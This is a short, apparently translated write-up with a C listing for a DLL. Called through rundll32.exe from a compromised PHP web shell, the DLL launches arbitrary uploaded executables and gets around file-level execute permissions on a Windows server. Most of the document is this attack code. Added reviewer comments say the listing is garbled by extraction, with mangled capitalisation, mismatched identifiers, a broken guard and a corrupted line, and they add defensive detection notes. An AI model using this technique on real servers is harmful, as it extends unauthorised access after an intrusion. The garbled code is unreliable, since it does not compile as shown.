Abstract: On a web shell where the system permissions are tightly set, ordinary exe files have no execute permission, and an exe uploaded to a writable directory has no execute permission either. Rundll32.exe was missed when those permissions were set. If that is the case, this code applies.
At the start of the test, PHP did not seem to have the right to execute commands. I had planned to use one of PHP's own overflow problems to obtain a low-privilege shell through an overflow. Later it turned out, unexpectedly, that the proc_open function could execute some internal commands, but external commands and directories both had strict permission settings. So only the external commands that could be used were tested. rundll32.exe was the last program tested, and that is where the insufficient-permission responses ended. The approach is to write a DLL and call rundll32 to execute any self-uploaded exe file. Perhaps this is a small problem with Windows permissions? After all, the identity under which the exe indirectly executed by rundll32 runs is still the guest permission of the PHP shell, even though the caller has changed — the real reason remains to be studied further.
/*************************************** **************************************** ******************
* When a server's permissions are set in a very odd way, the system's exe files cannot be executed, and a self-uploaded exe in a writable directory cannot be executed either.
* The root cause is that they forgot to set the permission on the rundll32.exe file ......
* Code by wustyunshu ### hotmail.com,: 20
**************************************** **************************************** *****************/
# Include <stdio. h>
# Include <stdlib. h>
# Include <windows. h>
// DLL entry point.
// Returns true for every reason code, so the module attaches without doing any
// initialization of its own; the actual work is in RunExe further down.
// NOTE(review): this listing is case-mangled by extraction ("Bool", "Return",
// "apientry") and is not compilable as shown; read it as the author's
// description of the technique, not as a drop-in source file.
#
Bool apientry DllMain (HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
#
{
#
Return true;
#
}
// RunExe — the function rundll32.exe is pointed at. Its parameter layout matches
// the rundll32 callback convention (window handle, module instance, ANSI command
// line, show-window flag). It splits the command line it is handed, launches the
// first token as a child process with the remaining tokens as arguments, lets
// the child run for 60 seconds, then terminates it.
//
// Defensive notes: the child runs under the same token as the rundll32 host
// (the write-up above observes that the identity stays that of the PHP shell),
// so what is bypassed here is a file-level execute permission, not a privilege
// boundary. A web-server worker spawning rundll32.exe, which loads a DLL from a
// writable/upload directory and then spawns a further child, is a high-signal
// process-tree anomaly for EDR / Sysmon process-creation rules. Application
// control (AppLocker / WDAC) with DLL rules, and removing rundll32.exe from what
// the web service account may execute, close the gap described in the abstract.
//
// NOTE(review): the listing is case-mangled by extraction ("Void", "If",
// "Wchar_t") and some identifiers differ between declaration and use; it is a
// description of the technique rather than compilable source.
#
Void RunExe (HWND hwnd, HINSTANCE hinst, LPSTR sz1_line, int nCmdShow)
#
{
#
// Intended guard for a missing command line (as extracted it reads `=`, not `==`).
If (sz1_line = NULL)
#
{
#
Return;
#
}
#
#
// Sizing pass: length of the ANSI command line in wide characters, terminator included.
DWORD dwNum = MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, NULL, 0 );
#
// Heap buffer for the wide command line; it is never released in this listing.
Wchar_t * wsz1_line = new wchar_t [dwNum];
#
// Allocation check (the identifier here differs from the buffer declared above).
If (! WszCmdLine)
#
{
#
Return;
#
}
#
// Conversion pass into the buffer sized above.
MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, wsz1_line, dwNum );
#
#
// Split the wide command line into argv: argv[0] is the program path, the rest
// are its arguments. The argv array is not freed in this listing.
Int argc;
#
LPWSTR * argv = CommandLineToArgvW (wsz1_line, & argc );
#
#
// Fixed-size buffers for the program path and for the argument string.
Wchar_t Cmd [256] = {0 };
#
Wchar_t Args [1024] = {0 };
#
#
// Strncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
// Program path comes from the first token.
Wcsncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
// Remaining tokens are appended, space-separated, to Args (this line is garbled
// in the extraction).
If (argc> 1)
#
{
#
For (int index = 1; index <argc; index ++)
#
{
#
Wcscat (Args, L ""), argv [index]);
#
}
#
}
#
#
// Startup info for the child: cleared, then filled from the host's own
// startup info.
STARTUPINFO si;
#
Memset (void *) & si, 0, sizeof (STARTUPINFOA ));
#
GetStartupInfoW (& si );
#
#
// Startup flags for the child. The original comment spoke of I/O redirection,
// but no redirection is set up here — only the show-window flag is used, and the
// SW_HIDE assignment is commented out, so wShowWindow is not overridden.
#
Si. cb = sizeof (si );
#
Si. dwFlags = STARTF_USESHOWWINDOW;
#
// Si. wShowWindow = SW_HIDE;
#
#
PROCESS_INFORMATION processInfo;
#
Memset (void *) & processInfo, 0, sizeof (PROCESS_INFORMATION ));
#
#
// Create a process: launches Cmd with Args, handle inheritance on (5th argument
// is 1), no creation flags, inheriting the caller's environment and directory.
// The return value is not checked, so a failed launch falls through to the
// TerminateProcess below with a process handle that is presumably still zero.
#
CreateProcessW (Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, & si, & processInfo );
#
#
// Give the child 60 seconds, then kill it. Neither the process nor the thread
// handle is closed in this listing.
Sleep (60*1000 );
#
TerminateProcess (processInfo. hProcess, 0 );
#
}